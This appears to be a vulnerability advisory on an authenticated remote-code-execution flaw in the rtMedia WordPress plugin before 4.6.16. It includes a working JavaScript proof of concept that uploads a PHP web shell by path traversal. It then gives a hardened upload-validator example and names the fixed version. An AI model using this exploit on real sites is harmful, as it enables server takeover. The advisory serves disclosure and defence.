WordPress Plugin Vulnerabilities

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

Description

The plugin does not validate the files being uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files, such as PHP scripts, to the server.

Proof of Concept

If the plugin's JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in the plugin settings and installing BuddyPress, run the following code, replacing the username, password, and server path as needed.

// Step 1: authenticate through the plugin's JSON API to obtain an access token.
fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", {
	"headers": {
		"content-type": "application/x-www-form-urlencoded",
	},
	"body": "method=wp_login&username=USERNAME&password=PASSWORD",
	"method": "POST",
}).then((response) => {
	return response.json();
}).then((data) => {
	// Step 2: the upload method takes base64-encoded file content plus a
	// caller-controlled destination path; neither is validated before the
	// file is written to disk.
	const formData = new FormData();
	formData.append('rtmedia_file', btoa('<?php system("ps"); ?>'));
	formData.append('method', 'rtmedia_upload_media');
	formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php');
	formData.append('title', '../');
	formData.append('token', data.data.access_token);

	fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', {
		method: 'POST',
		body: formData
	});
});
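The two weaknesses the PoC relies on are a client-chosen destination path and unchecked file content. The following is an added example of how a server-side upload handler can close both; it is hypothetical code written for this page, not rtMedia's own implementation, and the function name, allowlist and directory argument are assumptions.

```php
<?php
// Hypothetical hardened media upload validator (added example, not plugin code).
// Only these extensions are accepted, and each must match its sniffed MIME type.
const ALLOWED_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
];

/**
 * Returns an absolute destination path chosen by the server, or throws.
 * $clientName is whatever the client sent; $tmpPath is the received file;
 * $uploadDir is the single directory uploads are allowed to land in.
 */
function validate_media_upload(string $clientName, string $tmpPath, string $uploadDir): string
{
    // 1. Never let the client pick a directory: strip any path component,
    //    and refuse dotfiles (e.g. .htaccess) and embedded NUL bytes.
    $name = basename(str_replace('\\', '/', $clientName));
    if ($name === '' || $name[0] === '.' || strpos($name, "\0") !== false) {
        throw new RuntimeException('invalid file name');
    }

    // 2. Extension allowlist, lowercased. Only the final extension counts, so
    //    "shell.php.jpg" is judged as "jpg" and then by its real content.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('file type not allowed');
    }

    // 3. Judge the bytes on disk, not the client-supplied Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }

    // 4. Random server-chosen name inside the fixed, resolved upload directory;
    //    no part of the original name or any caller path reaches the filesystem.
    $base = realpath($uploadDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('upload directory unavailable');
    }
    return $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}
```

MIME sniffing alone does not reject a valid image with PHP appended, so pair this with a web-server rule that never executes scripts under the upload directory.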

Affects Plugins

Fixed in 4.6.16

References

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Verified
Yes

Timeline

Publicly Published
2023-11-29
Added
2023-11-29
Last Updated
2023-11-29